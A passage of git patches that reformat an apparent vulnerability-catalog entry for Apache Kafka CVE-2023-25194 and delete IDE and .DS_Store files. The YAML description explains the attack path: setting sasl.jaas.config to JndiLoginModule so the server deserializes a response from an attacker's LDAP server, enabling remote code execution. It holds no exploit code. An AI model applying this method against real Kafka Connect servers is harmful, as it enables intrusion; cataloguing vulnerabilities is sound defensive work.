 delete mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/jarRepositories.xml
 delete mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/misc.xml

diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/.gitignore b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/.gitignore
deleted file mode 100644
index 13566b81..00000000
--- a/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/.gitignore
+++ /dev/null
@@ -1,8 +0,0 @@
-# Default ignored files
-/shelf/
-/workspace.xml
-# Editor-based HTTP Client requests
-/httpRequests/
-# Datasource local storage ignored files
-/dataSources/
-/dataSources.local.xml
diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/compiler.xml b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/compiler.xml
deleted file mode 100644
index 10e71cf9..00000000
--- a/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/compiler.xml
+++ /dev/null
@@ -1,13 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<project version="4">
-  <component name="CompilerConfiguration">
-    <annotationProcessing>
-      <profile name="Maven default annotation processors profile" enabled="true">
-        <sourceOutputDir name="target/generated-sources/annotations" />
-        <sourceTestOutputDir name="target/generated-test-sources/test-annotations" />
-        <outputRelativeToContentRoot value="true" />
-        <module name="CVE-2023-25194" />
-      </profile>
-    </annotationProcessing>
-  </component>
-</project>
\ No newline at end of file
diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/jarRepositories.xml b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/jarRepositories.xml
deleted file mode 100644
index 5a2f139c..00000000
--- a/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/jarRepositories.xml
+++ /dev/null
@@ -1,20 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<project version="4">
-  <component name="RemoteRepositoriesConfiguration">
-    <remote-repository>
-      <option name="id" value="central" />
-      <option name="name" value="Central Repository" />
-      <option name="url" value="http://maven.aliyun.com/nexus/content/groups/public/" />
-    </remote-repository>
-    <remote-repository>
-      <option name="id" value="central" />
-      <option name="name" value="Maven Central repository" />
-      <option name="url" value="https://repo1.maven.org/maven2" />
-    </remote-repository>
-    <remote-repository>
-      <option name="id" value="jboss.community" />
-      <option name="name" value="JBoss Community repository" />
-      <option name="url" value="https://repository.jboss.org/nexus/content/repositories/public/" />
-    </remote-repository>
-  </component>
-</project>
\ No newline at end of file
diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/misc.xml b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/misc.xml
deleted file mode 100644
index fe1451cb..00000000
--- a/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/misc.xml
+++ /dev/null
@@ -1,14 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<project version="4">
-  <component name="ExternalStorageConfigurationManager" enabled="true" />
-  <component name="MavenProjectsManager">
-    <option name="originalFiles">
-      <list>
-        <option value="$PROJECT_DIR$/pom.xml" />
-      </list>
-    </option>
-  </component>
-  <component name="ProjectRootManager" version="2" languageLevel="JDK_1_8" default="true" project-jdk-name="1.8 (2)" project-jdk-type="JavaSDK">
-    <output url="file://$PROJECT_DIR$/out" />
-  </component>
-</project>
\ No newline at end of file
-- 
Gitee


From bb026949bee2f7e101eb825b2d9e7b74937c426a Mon Sep 17 00:00:00 2001
From: Bihe Zhao <13012563808@163.com>
Date: Sat, 18 Mar 2023 23:11:37 +0800
Subject: [PATCH 4/7] =?UTF-8?q?=E4=BF=AE=E6=94=B9=E6=A0=BC=E5=BC=8F?=
 =?UTF-8?q?=E9=97=AE=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .../CVE-2023-25194-java/.DS_Store             | Bin 6148 -> 0 bytes
 .../CVE-2023-25194-java/src/.DS_Store         | Bin 6148 -> 0 bytes
 .../CVE-2023-25194-java/src/main/.DS_Store    | Bin 6148 -> 0 bytes
 .../2023/yaml/CVE-2023-25194.yaml             |  18 +++++++++---------
 4 files changed, 9 insertions(+), 9 deletions(-)
 delete mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.DS_Store
 delete mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/src/.DS_Store
 delete mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/src/main/.DS_Store

diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.DS_Store b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.DS_Store
deleted file mode 100644
index 437bf16d324cca9b1efd2231476295416454f8de..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 6148
zcmeHK&u`N(6n<{IHr0gG14z3dS=zN4WkviDmr%xm>oUOsP)U|*L}YQ*q!g*Dlr#J>
zT=`4*ci8uA54Gz!4gq>kdj9O^?>Wh5%Z`aijppfnq8<?iaK=U##WlwL>|56Gkv34-
zG2)lGIZbktY;h&<cPhYhw?hY%QA!h9pFds_&)^3?t=ZS_(3A|FgZ~+2zBb#;{&t1k
zq>^TIy2(;^uV*ETa_U#k_hg!9Wi=T5P>p75r`-uU!EW#_`d}7O6<70e6wlsp>%^Em
zxva;@t8B6u_ijHoMHOeoWM&hxbOOrT*IAL8#mLNyw6wXA>j=6*cih`sE{BgE_x12_
zxa#ZWlfyw@KNvn-t-8UT{d-T3#~<_a!hEqBkiuHGcFW@>d_~27^QUN5<fb@7gxPJX
zD25hi(73vy2WPEojHZ|<APR^AH>`l)$AaA(evS+;3Wx&#o&vl-XgFi&v36*;4ixqZ
z0Bj*_4R!t%<Q(lW^jJGY4@|jKpi5Q$ilJOO;@a~<kF`UWPRd_Clz+1FHxy-`j`6jn
zlL{S5DGG=Jn+h~tv&ZNEi{Ib>H<P3#3Wx&#l>(}D6djH5N&alz`ZzvoHT*rCjd``h
lUn!{AqZnL1iud5w5Z7D*h8}B&h`{7Wz{((nDDX!WxB#1gc#i-8

diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/src/.DS_Store b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/src/.DS_Store
deleted file mode 100644
index a3a6aff4d353ba5afdaa1127b2d6ab7434c0d075..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 6148
zcmeHKy-ve05I&bcQ&mVEK<XHYwSv+je#8<=8CVH|0Z>V31rceCnv@PzrOfa!tUL*?
z19!HmXn_$#(VcYu?DL%+e~xS)0EkAvy$(<U02`GsSHR*6p?=a&k~0<yQP3ENk-Q2b
z8DN_RWcm9H(B4_l1s_6)r}l3T`&M6-sD+IEf<ba;_W3!ui^3$WR$oMJ&YEAy+j+Za
zUwAii;H7@rPa1yjj9SN1M!|dC4^G0)pjBGhmvQQcai^yO!gdE;&QHU*Ee8$RkK2ig
z^>l|_unVnHc{r?ZZC9Lntv;$a!<|~S;%wA6N27whyt1}?)Vhtjv3$_f3;ZvYEE;@=
zN34w3bMN)yNXFM_BYz80=s*JL6dzC6_mK~5vM>Y805dR?44AXgF3#lF^G7oS%)n1F
zK<9&lO6VHQG^(Qm3zY&O(lb&C*45J=(IEq(YcSJ@78IdF5p}3ADTXkagV5pF?;8J1
zqYek5X2x;M%)(?S!XzHTQSKmIja)JV%)lfAbGlig`~Tqk{C_ftTg(76@UIvUR?}-X
za7pHF{j@l`YaP@}R1)&bG>${CqOM}}rK`A%ss!y0RS;c+nMSmr@Iye+zy&k#s|>sW
Dwb)>d

diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/src/main/.DS_Store b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/src/main/.DS_Store
deleted file mode 100644
index 161d9f6e0c1fea4f00334944e674eb7c9f9fc825..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 6148
zcmeHKO;6iE5S>j@u!Sn+P$Z6)dW}kotA3~#Hw}kgF)9bBf{i0^>w2R&A%`fE&+U)l
z+F#PY18;Vh2m-yLf@Y-IH#<9Hd*52SJ4B><)9f`-n}|FpW5Y*tkMKC_9cegE3#j-R
zUkZJa7CJ?rA1LzwGr()tqVJT@IVCIW_X%UKE{&LpEaTEyHFE3xCmj`eHR*Q$sz$T*
zY;E0J_cpw5@tK~*lVmcjddc{Zd;3}!>9w7tU-RK?(0=h*my;wfhhvkFXG4S>9pq)E
zXFWYFv&!VgcEIyJf6(5V&%<}`J3+V;E;_;d!%nvoyb0ef7QVOna{J@n;79SZ)W0nC
z3jd{%=MJyoH;m<c&f{@e=<*akj`wLyL#jyA6xIpbE6iLV>LxSjiU<S3fH3fg7;t-|
zxABO+Sw2-55C$HG0p1@1C}ZTXwrI8vG^PXq@-@;3Y;*Mo2J8Sv4r`0>K$J}d+EnFA
z4CN{ZWz#Vpx%k?mO($jEjOVyFD_5Z?S9qwvgp-OaN-GQq1GgDy+HRZA|J{Gr|F@H*
zCkzM!Pl^H6>c{;arsU4nJCozHHh>;OSvan?xJ-dzj$*{}QM?5;0)M~;FmhO1ga;xQ
N0Yif{!oY(va0S~CVx#~7

diff --git a/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml b/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml
index 43b5846e..90d2e24e 100644
--- a/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml
+++ b/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml
@@ -4,15 +4,15 @@ source:
 info:
   name: Apache Kafka is a distributed event store and stream-processing platform. It is an open-source system developed by the Apache Software Foundation written in Java and Scala.
   severity: high
-  description: A possible security vulnerability has been identified in Apache Kafka Connect. 
-  This requires access to a Kafka Connect worker, and the ability to create/modify connectors on it with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol, which has been possible on Kafka Connect clusters since Apache Kafka 2.3.0. 
-  When configuring the connector via the Kafka Connect REST API, an authenticated operator can set the `sasl.jaas.config` property for any of the connector's Kafka clients to "com.sun.security.auth.module.JndiLoginModule", which can be done via the `producer.override.sasl.jaas.config`, `consumer.override.sasl.jaas.config`, or `admin.override.sasl.jaas.config` properties. This will allow the server to connect to the attacker's LDAP server and deserialize the LDAP response, which the attacker can use to execute java deserialization gadget chains on the Kafka connect server. 
-  Attacker can cause unrestricted deserialization of untrusted data (or) RCE vulnerability when there are gadgets in the classpath. 
-  scope-of-influence:
-  Apache Kafka 2.3.0
-  reference:
-  - https://github.com/ohnonoyesyes/CVE-2023-25194
-  - https://github.com/luelueking/Java-CVE-Lists/tree/main/CVE-2023-25194
+  description:  |
+    A possible security vulnerability has been identified in Apache Kafka Connect. 
+    This requires access to a Kafka Connect worker, and the ability to create/modify connectors on it with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol, which has been possible on Kafka Connect clusters since Apache Kafka 2.3.0. 
+    When configuring the connector via the Kafka Connect REST API, an authenticated operator can set the `sasl.jaas.config` property for any of the connector's Kafka clients to "com.sun.security.auth.module.JndiLoginModule", which can be done via the `producer.override.sasl.jaas.config`, `consumer.override.sasl.jaas.config`, or `admin.override.sasl.jaas.config` properties. This will allow the server to connect to the attacker's LDAP server and deserialize the LDAP response, which the attacker can use to execute java deserialization gadget chains on the Kafka connect server. 
+    Attacker can cause unrestricted deserialization of untrusted data (or) RCE vulnerability when there are gadgets in the classpath. 
+  scope-of-influence: Apache Kafka 2.3.0
+  reference:  |
+    - https://github.com/ohnonoyesyes/CVE-2023-25194
+    - https://github.com/luelueking/Java-CVE-Lists/tree/main/CVE-2023-25194
   classification:
   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
   cvss-score: 8.8
-- 
Gitee


From c090e822b80247da2d5c1241fee0ef8184cfd44c Mon Sep 17 00:00:00 2001
From: Bihe Zhao <13012563808@163.com>
Date: Sat, 18 Mar 2023 23:15:02 +0800
Subject: [PATCH 5/7] =?UTF-8?q?=E4=BF=AE=E6=94=B9=E6=A0=BC=E5=BC=8F?=
 =?UTF-8?q?=E9=97=AE=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml b/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml
index 90d2e24e..1fe418f6 100644
--- a/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml
+++ b/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml
@@ -10,7 +10,7 @@ info:
     When configuring the connector via the Kafka Connect REST API, an authenticated operator can set the `sasl.jaas.config` property for any of the connector's Kafka clients to "com.sun.security.auth.module.JndiLoginModule", which can be done via the `producer.override.sasl.jaas.config`, `consumer.override.sasl.jaas.config`, or `admin.override.sasl.jaas.config` properties. This will allow the server to connect to the attacker's LDAP server and deserialize the LDAP response, which the attacker can use to execute java deserialization gadget chains on the Kafka connect server. 
     Attacker can cause unrestricted deserialization of untrusted data (or) RCE vulnerability when there are gadgets in the classpath. 
   scope-of-influence: Apache Kafka 2.3.0
-  reference:  |
+  reference:
     - https://github.com/ohnonoyesyes/CVE-2023-25194
     - https://github.com/luelueking/Java-CVE-Lists/tree/main/CVE-2023-25194
   classification:
-- 
Gitee


From 24dc5d27dd407b02fb13304e8eb49018b6ed0915 Mon Sep 17 00:00:00 2001
From: Bihe Zhao <13012563808@163.com>
Date: Tue, 21 Mar 2023 16:36:46 +0800
Subject: [PATCH 6/7] =?UTF-8?q?=E4=BF=AE=E6=94=B9=E6=A0=BC=E5=BC=8F?=
 =?UTF-8?q?=E9=97=AE=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml | 17 +++++++----------
 1 file changed, 7 insertions(+), 10 deletions(-)

diff --git a/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml b/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml
index 1fe418f6..092fd0ea 100644
--- a/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml
+++ b/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml
@@ -5,19 +5,16 @@ info:
   name: Apache Kafka is a distributed event store and stream-processing platform. It is an open-source system developed by the Apache Software Foundation written in Java and Scala.
   severity: high
   description:  |
-    A possible security vulnerability has been identified in Apache Kafka Connect. 
-    This requires access to a Kafka Connect worker, and the ability to create/modify connectors on it with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol, which has been possible on Kafka Connect clusters since Apache Kafka 2.3.0. 
-    When configuring the connector via the Kafka Connect REST API, an authenticated operator can set the `sasl.jaas.config` property for any of the connector's Kafka clients to "com.sun.security.auth.module.JndiLoginModule", which can be done via the `producer.override.sasl.jaas.config`, `consumer.override.sasl.jaas.config`, or `admin.override.sasl.jaas.config` properties. This will allow the server to connect to the attacker's LDAP server and deserialize the LDAP response, which the attacker can use to execute java deserialization gadget chains on the Kafka connect server. 
-    Attacker can cause unrestricted deserialization of untrusted data (or) RCE vulnerability when there are gadgets in the classpath. 
+    A possible security vulnerability has been identified in Apache Kafka Connect. Attacker can cause unrestricted deserialization of untrusted data (or) RCE vulnerability when there are gadgets in the classpath. 
   scope-of-influence: Apache Kafka 2.3.0
   reference:
     - https://github.com/ohnonoyesyes/CVE-2023-25194
     - https://github.com/luelueking/Java-CVE-Lists/tree/main/CVE-2023-25194
   classification:
-  cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
-  cvss-score: 8.8
-  cve-id: CVE-2023-25194
-  cwe-id: CWE-502
-  cnvd-id: None
-  kve-id: None
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2023-25194
+    cwe-id: CWE-502
+    cnvd-id: None
+    kve-id: None
   tags: Deserialization of Untrusted Data
\ No newline at end of file
-- 
Gitee


From 1937a7e46d6d0f7861616ee4ec68191f772dd567 Mon Sep 17 00:00:00 2001
From: Bihe Zhao <13012563808@163.com>
Date: Mon, 3 Apr 2023 19:56:55 +0800
Subject: [PATCH 7/7] =?UTF-8?q?yaml=E6=96=87=E4=BB=B6=E4=BF=AE=E6=94=B9?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml b/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml
index 092fd0ea..cc9b4e96 100644
--- a/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml
+++ b/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml
@@ -8,8 +8,8 @@ info:
     A possible security vulnerability has been identified in Apache Kafka Connect. Attacker can cause unrestricted deserialization of untrusted data (or) RCE vulnerability when there are gadgets in the classpath. 
   scope-of-influence: Apache Kafka 2.3.0
   reference:
-    - https://github.com/ohnonoyesyes/CVE-2023-25194
-    - https://github.com/luelueking/Java-CVE-Lists/tree/main/CVE-2023-25194
+    - https://nvd.nist.gov/vuln/detail/cve-2023-25194
+    - https://lists.apache.org/thread/vy1c7fqcdqvq5grcqp6q5jyyb302khyz
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
-- 
Gitee